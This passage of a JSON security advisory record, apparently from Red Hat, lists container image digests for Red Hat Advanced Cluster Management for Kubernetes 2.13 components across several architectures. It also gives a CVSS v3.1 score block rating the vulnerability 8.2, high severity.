"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
